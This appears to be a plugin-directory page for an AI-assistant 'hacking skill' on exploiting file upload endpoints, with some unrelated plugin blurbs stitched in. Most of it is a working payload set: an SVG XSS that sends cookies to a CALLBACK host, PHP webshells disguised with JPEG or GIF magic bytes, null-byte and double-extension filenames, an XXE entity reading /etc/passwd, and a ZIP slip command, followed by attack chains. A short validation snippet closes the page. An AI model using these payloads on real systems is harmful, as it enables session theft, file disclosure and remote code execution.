From meta
Use when testing file upload endpoints for unrestricted file upload, MIME type bypass, magic byte spoofing, polyglot files, SVG XSS, XXE via Office documents, ZIP slip, and path traversal in filenames. Trigger on: multipart/form-data endpoints, avatar/document upload flows, import-from-file features, profile image, CSV/Excel import, DOCX/XLSX parsing, image resizing pipelines, archive extraction, and any endpoint that stores or serves user-supplied files. Detects extension bypass (shell.php.jpg), null byte injection, double extension, ImageMagick exploits, and content-type confusion.
npx claudepluginhub securityfortech/hacking-skills --plugin metaThis skill uses the workspace's default tool permissions.
File upload endpoints that validate file type only by extension or Content-Type header
Guides Next.js Cache Components and Partial Prerendering (PPR) with cacheComponents enabled. Implements 'use cache', cacheLife(), cacheTag(), revalidateTag(), static/dynamic optimization, and cache debugging.
Guides building MCP servers enabling LLMs to interact with external services via tools. Covers best practices, TypeScript/Node (MCP SDK), Python (FastMCP).
Generates original PNG/PDF visual art via design philosophy manifestos for posters, graphics, and static designs on user request.
File upload endpoints that validate file type only by extension or Content-Type header allow attackers to upload executable files, XSS payloads, XXE-triggering documents, or path-traversal archives. Depending on where files are stored and served, impact ranges from stored XSS to full remote code execution.
multipart/form-data POST endpoints accepting user filesshell.php.jpg, shell.php%00.jpg, shell.jpg.php.Content-Type to image/jpeg while uploading a PHP/JSP file.<svg onload="..."> for XSS.../ paths (ZIP slip).# SVG XSS
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://CALLBACK/?c='+document.cookie)"/>
# PHP webshell disguised as JPEG (magic bytes prepend)
printf '\xff\xd8\xff\xe0' > shell.php.jpg
echo '<?php system($_GET["cmd"]); ?>' >> shell.php.jpg
# Null byte bypass (older systems)
filename: shell.php%00.jpg
# XXE in DOCX — inject into word/document.xml inside the archive
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
# ZIP slip
zip --symlinks traversal.zip ../../etc/passwd
# Polyglot GIF+PHP
GIF89a<?php system($_GET['cmd']); ?>
Magic bytes reference:
| Type | Hex |
|---|---|
| JPEG | FF D8 FF |
| PNG | 89 50 4E 47 0D 0A 1A 0A |
| GIF | 47 49 46 38 |
25 50 44 46 | |
| ZIP/DOCX | 50 4B 03 04 |
| Attack | Technique |
|---|---|
| Extension bypass | shell.php.jpg — server splits on first dot |
| Double extension | shell.jpg.php — server uses last extension |
| Null byte | shell.php%00.jpg — older parsers truncate at null |
| MIME spoof | Content-Type: image/jpeg on PHP file |
| Magic byte prepend | Prefix file with valid JPEG/GIF header bytes |
| Polyglot | File valid as both JPEG and PHP simultaneously |
| SVG with JS | XML-based, browsers execute onload from same origin |
| XXE in Office | DOCX/XLSX are ZIP+XML; inject DTD in contained XML |
| ZIP slip | Archive paths containing ../ extract outside intended dir |
| Content-type sniff | Omit Content-Type; let browser sniff — bypass nosniff-less servers |
Stored XSS via SVG:
Setup → Application accepts SVG avatar uploads, serves them from same origin.
Trigger → Upload SVG with <svg onload="fetch('https://CALLBACK/?c='+document.cookie)">.
Impact → Any user viewing the avatar triggers XSS; session tokens exfiltrated.
RCE via PHP upload:
Setup → PHP application accepts image uploads, validates only Content-Type header.
Trigger → Upload shell.php with Content-Type: image/jpeg; access via direct URL.
Impact → Remote command execution on server.
XXE via XLSX import: Setup → Application parses Excel files for data import. Trigger → Upload crafted XLSX with XXE payload in sheet XML referencing internal files. Impact → Server-side file read; possible SSRF to internal metadata endpoints.
# Validate magic bytes, not just extension
import magic
allowed_mimes = {'image/jpeg', 'image/png', 'image/gif'}
detected = magic.from_buffer(file.read(2048), mime=True)
if detected not in allowed_mimes:
raise ValueError("Invalid file type")
# Always rename to UUID; never use original filename
import uuid, os
ext_map = {'image/jpeg': '.jpg', 'image/png': '.png'}
safe_name = str(uuid.uuid4()) + ext_map[detected]
XXE payloads embedded in DOCX/XLSX connect directly to [[xxe]]. SVG XSS from same-origin uploads is [[xss-stored]]. Path traversal in zip extraction is [[path-traversal]]. If the upload URL is fetched server-side, pivot to [[ssrf]].